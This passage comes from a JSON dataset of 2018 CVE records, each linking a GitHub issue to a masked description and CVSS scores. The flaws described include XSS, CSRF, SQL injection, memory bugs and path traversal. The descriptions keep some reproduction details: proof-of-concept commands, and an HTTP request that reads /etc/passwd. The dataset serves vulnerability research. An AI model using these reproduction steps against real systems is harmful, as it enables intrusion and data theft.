  26400. "severity": "MEDIUM",
  26401. "baseScore": 5.4,
  26402. "impactScore": 2.7,
  26403. "exploitabilityScore": 2.3
  26404. },
  26405. {
  26406. "CVE_ID": "CVE-2018-17426",
  26407. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/154",
  26408. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/154",
  26409. "Repo_new": "wuzhicms/wuzhicms",
  26410. "Issue_Created_At": "2018-09-19T05:16:06Z",
  26411. "description": "WUZHI CMS NUMBERTAG There is a a Stored XSS . WUZHI CMS NUMBERTAG There is a a Stored XSS Extension module SMS in station POC APITAG FILETAG FILETAG FILETAG",
  26412. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26413. "severity": "MEDIUM",
  26414. "baseScore": 5.4,
  26415. "impactScore": 2.7,
  26416. "exploitabilityScore": 2.3
  26417. },
  26418. {
  26419. "CVE_ID": "CVE-2018-17427",
  26420. "Issue_Url_old": "https://github.com/lemire/simdcomp/issues/21",
  26421. "Issue_Url_new": "https://github.com/lemire/simdcomp/issues/21",
  26422. "Repo_new": "lemire/simdcomp",
  26423. "Issue_Created_At": "2018-09-19T05:38:33Z",
  26424. "description": "heap buffer overflow (detected by APITAG Here is my function APITAG : FILETAG sizeof in is NUMBERTAG packing unpacking APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG a NUMBERTAG bp NUMBERTAG ffe5a NUMBERTAG c NUMBERTAG sp NUMBERTAG ffe5a NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG eac7 ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG f ( PATHTAG NUMBERTAG d5c ( PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG f1c2cf NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b0 ( PATHTAG NUMBERTAG aaeb ( PATHTAG NUMBERTAG eac7 ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG f ( PATHTAG NUMBERTAG d5c ( PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG f1c2cf NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING MS NUMBERTAG APITAG APITAG ; base unit: APITAG APITAG PATHTAG ) PATHTAG ) artifact_prefix='./'; Test unit written to ./crash APITAG Base NUMBERTAG PATHTAG",
  26425. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26426. "severity": "MEDIUM",
  26427. "baseScore": 6.5,
  26428. "impactScore": 3.6,
  26429. "exploitabilityScore": 2.8
  26430. },
  26431. {
  26432. "CVE_ID": "CVE-2018-17429",
  26433. "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/4",
  26434. "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/4",
  26435. "Repo_new": "jetiben/jtbc",
  26436. "Issue_Created_At": "2018-09-18T08:08:14Z",
  26437. "description": "There is CSRF vulnerability that can add the administrator account. PATHTAG in JTBC NUMBERTAG C) has APITAG the administrator logged in, open the csrf exp page,will be add a administrator. csrf exp: FILETAG CODETAG",
  26438. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26439. "severity": "HIGH",
  26440. "baseScore": 8.8,
  26441. "impactScore": 5.9,
  26442. "exploitabilityScore": 2.8
  26443. },
  26444. {
  26445. "CVE_ID": "CVE-2018-17556",
  26446. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14094",
  26447. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14094",
  26448. "Repo_new": "modxcms/revolution",
  26449. "Issue_Created_At": "2018-09-26T06:04:30Z",
  26450. "description": "Stored XSS. Stored XSS: The application is vulnerable to stored XSS. Step to reproduce NUMBERTAG Under Media APITAG sources choose Create New Media source and enter the Xss Payload APITAG in the Name field and click on save NUMBERTAG The application renders the entered script and displays a pop up whenever the page is being visited by the user. Observed behavior The application processes the html tags or scripts and it is getting stored in the database. Expected behavior It should not accept any scripts or html tags. Environment MODX version:MODX Revolution NUMBERTAG pl",
  26451. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26452. "severity": "MEDIUM",
  26453. "baseScore": 5.4,
  26454. "impactScore": 2.7,
  26455. "exploitabilityScore": 2.3
  26456. },
  26457. {
  26458. "CVE_ID": "CVE-2018-17566",
  26459. "Issue_Url_old": "https://github.com/top-think/think/issues/858",
  26460. "Issue_Url_new": "https://github.com/top-think/think/issues/858",
  26461. "Repo_new": "top-think/think",
  26462. "Issue_Created_At": "2018-09-26T09:32:14Z",
  26463. "description": "Thinkphp NUMBERTAG delete\u51fd\u6570\u8bbe\u8ba1\u7f3a\u9677\u5efa\u8bae\u4fee\u6539. APITAG FILETAG APITAG FILETAG",
  26464. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26465. "severity": "CRITICAL",
  26466. "baseScore": 9.8,
  26467. "impactScore": 5.9,
  26468. "exploitabilityScore": 3.9
  26469. },
  26470. {
  26471. "CVE_ID": "CVE-2018-17574",
  26472. "Issue_Url_old": "https://github.com/YMFE/yapi/issues/520",
  26473. "Issue_Url_new": "https://github.com/ymfe/yapi/issues/520",
  26474. "Repo_new": "ymfe/yapi",
  26475. "Issue_Created_At": "2018-08-31T07:57:46Z",
  26476. "description": "Stored XSS in Project Name. Version NUMBERTAG Problem ~ Stored XSS in Project Name NUMBERTAG Register a account in the demo domain FILETAG Then new a project: FILETAG NUMBERTAG When the someone including the managers & administrators views the operation dynamics of the project, malicious js code will execute. FILETAG \u4ec0\u4e48\u6d4f\u89c8\u5668 ~ chrome APITAG Windows, APITAG ~ Linux",
  26477. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26478. "severity": "MEDIUM",
  26479. "baseScore": 5.4,
  26480. "impactScore": 2.7,
  26481. "exploitabilityScore": 2.3
  26482. },
  26483. {
  26484. "CVE_ID": "CVE-2018-17580",
  26485. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/485",
  26486. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/485",
  26487. "Repo_new": "appneta/tcpreplay",
  26488. "Issue_Created_At": "2018-09-25T11:06:23Z",
  26489. "description": "Heap Overflow in APITAG There exists a heap buffer overflow in function APITAG in the file APITAG of tcpreplay NUMBERTAG The issue can be reproduced when provided with an crafted pcap file as an input to the tcpreplay binary. Affected version NUMBERTAG branch Command : sudo tcpreplay i eno1 t K loop NUMBERTAG unique ip $POC Debugging CODETAG APITAG ASAN output ERRORTAG glibc detection ERRORTAG Reproducer File URLTAG",
  26490. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  26491. "severity": "HIGH",
  26492. "baseScore": 7.1,
  26493. "impactScore": 5.2,
  26494. "exploitabilityScore": 1.8
  26495. },
  26496. {
  26497. "CVE_ID": "CVE-2018-17581",
  26498. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/460",
  26499. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/460",
  26500. "Repo_new": "exiv2/exiv2",
  26501. "Issue_Created_At": "2018-09-25T16:06:25Z",
  26502. "description": "Stack overflow due to excessive stack consumption APITAG function). A stack overflow exits in APITAG at APITAG due to a recursive function call causing the excessive stack consumption which leads to Denial of service. Affected version: exi NUMBERTAG bit build) Command: ./exi NUMBERTAG pi $POC Debugging CODETAG ASAN Output ERRORTAG",
  26503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26504. "severity": "MEDIUM",
  26505. "baseScore": 6.5,
  26506. "impactScore": 3.6,
  26507. "exploitabilityScore": 2.8
  26508. },
  26509. {
  26510. "CVE_ID": "CVE-2018-17582",
  26511. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/484",
  26512. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/484",
  26513. "Repo_new": "appneta/tcpreplay",
  26514. "Issue_Created_At": "2018-09-24T14:33:44Z",
  26515. "description": "Heap overflow in APITAG tcpreplay contains a heap based buffer overflow vulnerability. The APITAG function in the APITAG file uses the APITAG function to copy sequences from the source buffer pktdata to the destination APITAG . However, there are no checks in place to ensure that dst is a non zero value. An attacker can exploit this vulnerability by submitting a malicious file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Affected version NUMBERTAG branch Command : sudo tcpreplay i eno1 t K loop NUMBERTAG unique ip $POC Debugging CODETAG CODETAG ERRORTAG CODETAG ASAN output ERRORTAG Valgrind report CODETAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  26516. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  26517. "severity": "HIGH",
  26518. "baseScore": 7.1,
  26519. "impactScore": 5.2,
  26520. "exploitabilityScore": 1.8
  26521. },
  26522. {
  26523. "CVE_ID": "CVE-2018-17785",
  26524. "Issue_Url_old": "https://github.com/blynkkk/blynk-server/issues/1256",
  26525. "Issue_Url_new": "https://github.com/blynkkk/blynk-server/issues/1256",
  26526. "Repo_new": "blynkkk/blynk-server",
  26527. "Issue_Created_At": "2018-09-30T05:56:51Z",
  26528. "description": "Path operation vulnerability NUMBERTAG normal boot software eg\uff1a java jar FILETAG APITAG Blynk/ APITAG paths and grab packets Modify HTTP request packet eg NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: APITAG Connection: Keep alive Accept Encoding: gzip,deflate User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: / eg NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: APITAG Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: URLTAG Cookie: session=f NUMBERTAG e NUMBERTAG f NUMBERTAG b NUMBERTAG b You can access /etc/passwd. FILETAG FILETAG FILETAG Thank you very much \uff01",
  26529. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  26530. "severity": "HIGH",
  26531. "baseScore": 7.5,
  26532. "impactScore": 3.6,
  26533. "exploitabilityScore": 3.9
  26534. },
  26535. {
  26536. "CVE_ID": "CVE-2018-17796",
  26537. "Issue_Url_old": "https://github.com/wuweiit/mushroom/issues/16",
  26538. "Issue_Url_new": "https://github.com/wuweiit/mushroom/issues/16",
  26539. "Repo_new": "wuweiit/mushroom",
  26540. "Issue_Created_At": "2018-09-21T06:30:41Z",
  26541. "description": "SQL injection vulnerability was discovered in MRCMS. Hi all, There are a SQL injection vulnerability found by Qihoo NUMBERTAG APITAG Team. Details as bellow: The APITAG method in the APITAG java file is used directly to hash and run SQL statements without filtering parameters, resulting in SQL injection\u3002 FILETAG Continuous tracing can be found that the APITAG method is invoked in APITAG FILETAG View APITAG () method FILETAG When param is empty (that is the first time), a param will be constructed \uff0c view the constructor. FILETAG You can see that all attributes in APITAG are obtained from request and are controlled by attackers.",
  26542. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26543. "severity": "CRITICAL",
  26544. "baseScore": 9.8,
  26545. "impactScore": 5.9,
  26546. "exploitabilityScore": 3.9
  26547. },
  26548. {
  26549. "CVE_ID": "CVE-2018-17825",
  26550. "Issue_Url_old": "https://github.com/adplug/adplug/issues/67",
  26551. "Issue_Url_new": "https://github.com/adplug/adplug/issues/67",
  26552. "Repo_new": "adplug/adplug",
  26553. "Issue_Created_At": "2018-09-04T02:57:54Z",
  26554. "description": "double free in APITAG There are several suspected double free bugs ( CVETAG with APITAG in APITAG This destructor calls APITAG and APITAG in succession. As defined in fmopl.c, however, APITAG OPL) calls APITAG which invokes APITAG APITAG frees the four global pointers TL_TABLE, SIN_TABLE, AMS_TABLE, VIB_TABLE by simply using the APITAG method. Therefore, the two successive calls of APITAG in APITAG are likely to cause double frees of the four pointers. One possible fix could be directly assigning each pointer to NULL after calling APITAG",
  26555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26556. "severity": "CRITICAL",
  26557. "baseScore": 9.8,
  26558. "impactScore": 5.9,
  26559. "exploitabilityScore": 3.9
  26560. },
  26561. {
  26562. "CVE_ID": "CVE-2018-17828",
  26563. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/62",
  26564. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/62",
  26565. "Repo_new": "gdraheim/zziplib",
  26566. "Issue_Created_At": "2018-09-25T13:32:45Z",
  26567. "description": "Directory traversal vulnerability in zziplib NUMBERTAG Directory traversal vulnerability in zziplib NUMBERTAG allows attackers to overwrite arbitrary files via a .. (dot dot) in an zip file. $unzzip mem FILETAG FILETAG Relevant code in function unzzip_cat in Unzzipcat mem.c: static int unzzip_cat (int argc, char argv, int extract) { ...... if (argc NUMBERTAG print directory list / ZZIP_MEM_ENTRY entry = APITAG DBG2(\"findfirst %p \", entry); for (; entry ; entry = zzip_mem_disk_findnext(disk, entry)) { char name = zzip_mem_entry_to_name (entry); FILE out = stdout; if (extract) out = create_fopen(name, \"wb NUMBERTAG no checkout here if (! out) { if (errno != EISDIR) { DBG3(\"can not open output file %i %s\", errno, strerror(errno)); done = EXIT_ERRORS; } continue; } unzzip_mem_disk_cat_file (disk, name, out); if (extract) fclose(out); } } ...... } static void APITAG disk, char name, FILE out) { ZZIP_DISK_FILE file = zzip_mem_disk_fopen (disk, name); if (file) { char buffer NUMBERTAG int len; while ((len = zzip_mem_disk_fread (buffer NUMBERTAG file))) { fwrite (buffer NUMBERTAG len, out); } zzip_mem_disk_fclose (file); } }",
  26568. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  26569. "severity": "MEDIUM",
  26570. "baseScore": 5.5,
  26571. "impactScore": 3.6,
  26572. "exploitabilityScore": 1.8
  26573. },
  26574. {
  26575. "CVE_ID": "CVE-2018-17830",
  26576. "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/421",
  26577. "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/421",
  26578. "Repo_new": "redaxo/redaxo4",
  26579. "Issue_Created_At": "2018-09-25T07:31:11Z",
  26580. "description": "Reflected Cross site scripting (XSS) vulnerability in REDAXO NUMBERTAG details in PATHTAG ERRORTAG It is worth noting that the value of $args here is introduced from the HTTP request. And the value is an array. Then the $args is processed by foreach. The program uses the htmlspecialchars function to process $arg_value, but does not handle $arg_name.So an attacker can insert an attack payload at $arg_name to cause XSS. POC The user directly accesses the URL if the user has logged in. URLTAG FILETAG Credit: APITAG of APITAG",
  26581. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26582. "severity": "MEDIUM",
  26583. "baseScore": 5.4,
  26584. "impactScore": 2.7,
  26585. "exploitabilityScore": 2.3
  26586. },
  26587. {
  26588. "CVE_ID": "CVE-2018-17831",
  26589. "Issue_Url_old": "https://github.com/redaxo/redaxo/issues/2043",
  26590. "Issue_Url_new": "https://github.com/redaxo/redaxo/issues/2043",
  26591. "Repo_new": "redaxo/redaxo",
  26592. "Issue_Created_At": "2018-09-26T05:41:03Z",
  26593. "description": "Sql Injection in Redaxo NUMBERTAG details in PATHTAG ERRORTAG Called the APITAG APITAG the function in PATHTAG ERRORTAG When the if condition is true, the function returns the value of the sort parameter obtained from the HTTP request. Go back to the APITAG function above. CODETAG When the value of APITAG is not empty, APITAG is directly spliced into the SQL statement. Caused SQL injection. Since this file APITAG is used by many functions in this system. So there are a lot of SQL injections. FILETAG At this point the URL becomes URLTAG Change the URL as follows: URLTAG APITAG APITAG Then visit the URL and you will see a response delay of NUMBERTAG s APITAG FILETAG The complete SQL statement executed is CODETAG Credit: APITAG of APITAG",
  26594. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26595. "severity": "CRITICAL",
  26596. "baseScore": 9.8,
  26597. "impactScore": 5.9,
  26598. "exploitabilityScore": 3.9
  26599. },
  26600. {
  26601. "CVE_ID": "CVE-2018-17835",
  26602. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1298",
  26603. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1298",
  26604. "Repo_new": "getsimplecms/getsimplecms",
  26605. "Issue_Created_At": "2018-09-28T04:08:28Z",
  26606. "description": "Insert Stored XSS in FILETAG . Type of vulnerability: Stored XSS Discovered by: iso NUMBERTAG Description: Stored XSS attack is one of the three major categories of XSS attacks, the others being Non Persistent (or Reflected) XSS and DOM based XSS. Step to reproduce the vulnerability: APITAG the CMS. APITAG Page FILETAG APITAG XSS payload (\"> APITAG <\") in the APITAG Permalink Structure\" parameter and click on APITAG Setting\". FILETAG APITAG Page FILETAG APITAG \"www\" in the title and body , click on \"save page\" to publish the page. FILETAG APITAG , as shown in the figure. FILETAG APITAG the page FILETAG FILETAG",
  26607. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26608. "severity": "MEDIUM",
  26609. "baseScore": 4.8,
  26610. "impactScore": 2.7,
  26611. "exploitabilityScore": 1.7
  26612. },
  26613. {
  26614. "CVE_ID": "CVE-2018-17847",
  26615. "Issue_Url_old": "https://github.com/golang/go/issues/27846",
  26616. "Issue_Url_new": "https://github.com/golang/go/issues/27846",
  26617. "Repo_new": "golang/go",
  26618. "Issue_Created_At": "2018-09-25T08:05:30Z",
  26619. "description": "PATHTAG panic: runtime error: index out of range. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG",
  26620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26621. "severity": "HIGH",
  26622. "baseScore": 7.5,
  26623. "impactScore": 3.6,
  26624. "exploitabilityScore": 3.9
  26625. },
  26626. {
  26627. "CVE_ID": "CVE-2018-17965",
  26628. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1052",
  26629. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1052",
  26630. "Repo_new": "imagemagick/imagemagick",
  26631. "Issue_Created_At": "2018-03-24T16:32:42Z",
  26632. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26633. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26634. "severity": "MEDIUM",
  26635. "baseScore": 6.5,
  26636. "impactScore": 3.6,
  26637. "exploitabilityScore": 2.8
  26638. },
  26639. {
  26640. "CVE_ID": "CVE-2018-17966",
  26641. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1050",
  26642. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1050",
  26643. "Repo_new": "imagemagick/imagemagick",
  26644. "Issue_Created_At": "2018-03-24T16:31:46Z",
  26645. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26646. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26647. "severity": "MEDIUM",
  26648. "baseScore": 6.5,
  26649. "impactScore": 3.6,
  26650. "exploitabilityScore": 2.8
  26651. },
  26652. {
  26653. "CVE_ID": "CVE-2018-17967",
  26654. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1051",
  26655. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1051",
  26656. "Repo_new": "imagemagick/imagemagick",
  26657. "Issue_Created_At": "2018-03-24T16:32:17Z",
  26658. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26659. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26660. "severity": "MEDIUM",
  26661. "baseScore": 6.5,
  26662. "impactScore": 3.6,
  26663. "exploitabilityScore": 2.8
  26664. },
  26665. {
  26666. "CVE_ID": "CVE-2018-17974",
  26667. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/486",
  26668. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/486",
  26669. "Repo_new": "appneta/tcpreplay",
  26670. "Issue_Created_At": "2018-10-03T16:37:25Z",
  26671. "description": "Heap overflow in APITAG . An heap overflow was triggered in function APITAG at file APITAG , due to inappropriate values in the function APITAG The length (pktlen + ctx > l2len) is larger than source value (packet + ctx >l2len) as the function failed to ensure the length of a packet is valid, causing segmentation fault. Affected version NUMBERTAG branch Command : sudo tcpreplay edit APITAG intf1=ens NUMBERTAG intf2=lo enet vlan=add enet vlan tag NUMBERTAG POC Debugging: ERRORTAG CODETAG ERRORTAG ASAN output ERRORTAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  26672. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26673. "severity": "MEDIUM",
  26674. "baseScore": 5.5,
  26675. "impactScore": 3.6,
  26676. "exploitabilityScore": 1.8
  26677. },
  26678. {
  26679. "CVE_ID": "CVE-2018-17986",
  26680. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/53",
  26681. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/53",
  26682. "Repo_new": "smiffy6969/razorCMS",
  26683. "Issue_Created_At": "2018-09-06T07:37:06Z",
  26684. "description": "CSRF Vulnerability. APITAG version NUMBERTAG Operating System Used: Microsoft Windows NUMBERTAG ulnerability Type: Cross Site Request Forgery(CSRF) Severity: High Vulnerability Description: CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the targeted end user is a normal user, a successful CSRF attack can compromise sensitive data. If the targeted end user is the administrator account, this type of attack can compromise the entire web application. STEPS TO REPRODUCE NUMBERTAG Log in to the Administrator user account. Crafted Code: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG Run the above code which changes the password of admin user to \"test APITAG NUMBERTAG After submitting the code the password is successfully changed.",
  26685. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26686. "severity": "HIGH",
  26687. "baseScore": 8.8,
  26688. "impactScore": 5.9,
  26689. "exploitabilityScore": 2.8
  26690. },
  26691. {
  26692. "CVE_ID": "CVE-2018-17988",
  26693. "Issue_Url_old": "https://github.com/AndyRixon/LayerBB/issues/51",
  26694. "Issue_Url_new": "https://github.com/andyrixon/layerbb/issues/51",
  26695. "Repo_new": "andyrixon/layerbb",
  26696. "Issue_Created_At": "2019-10-10T14:13:40Z",
  26697. "description": "SQL injection vulnerability. APITAG NUMBERTAG has SQL Injection via the FILETAG search_query parameter. Steps to Reproduce Issue in FILETAG NUMBERTAG CODETAG Unfiltered search_query results in SQL injection POC Packet parameters CODETAG Server Environment (PHP, APITAG Apache Version and Operating System): version NUMBERTAG",
  26698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26699. "severity": "CRITICAL",
  26700. "baseScore": 9.8,
  26701. "impactScore": 5.9,
  26702. "exploitabilityScore": 3.9
  26703. },
  26704. {
  26705. "CVE_ID": "CVE-2018-17996",
  26706. "Issue_Url_old": "https://github.com/AndyRixon/LayerBB/issues/38",
  26707. "Issue_Url_new": "https://github.com/andyrixon/layerbb/issues/38",
  26708. "Repo_new": "AndyRixon/LayerBB",
  26709. "Issue_Created_At": "2019-02-28T07:00:14Z",
  26710. "description": "APITAG NUMBERTAG CSRF Vulnerability APITAG Users). Vulnerability analysis APITAG added csrf_token to post request to prevent csrf vulnerability; at the time, get request was not prevented; there was still a csrf vulnerability that could be exploited. In the FILETAG file, the delete user is requested by get. FILETAG POC When the administrator accesses the following url, the account with id NUMBERTAG will be deleted. APITAG",
  26711. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  26712. "severity": "MEDIUM",
  26713. "baseScore": 6.5,
  26714. "impactScore": 3.6,
  26715. "exploitabilityScore": 2.8
  26716. },
  26717. {
  26718. "CVE_ID": "CVE-2018-18016",
  26719. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1049",
  26720. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1049",
  26721. "Repo_new": "imagemagick/imagemagick",
  26722. "Issue_Created_At": "2018-03-24T16:31:24Z",
  26723. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26724. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26725. "severity": "MEDIUM",
  26726. "baseScore": 6.5,
  26727. "impactScore": 3.6,
  26728. "exploitabilityScore": 2.8
  26729. },
  26730. {
  26731. "CVE_ID": "CVE-2018-18020",
  26732. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/243",
  26733. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/243",
  26734. "Repo_new": "qpdf/qpdf",
  26735. "Issue_Created_At": "2018-10-06T08:50:15Z",
  26736. "description": "A hangs close to ten minutes in qpdf . hi,I find something maybe wrong in the newest qpdf. the poc file will cause the program to be hanged about ten minutes. Maybe this is a bug or feature? FILETAG and I found that it maybe caused by the APITAG in APITAG are some backtrace: ERRORTAG Looking forward to you reply,thx : )",
  26737. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  26738. "severity": "LOW",
  26739. "baseScore": 3.3,
  26740. "impactScore": 1.4,
  26741. "exploitabilityScore": 1.8
  26742. },
  26743. {
  26744. "CVE_ID": "CVE-2018-18023",
  26745. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1336",
  26746. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1336",
  26747. "Repo_new": "imagemagick/imagemagick",
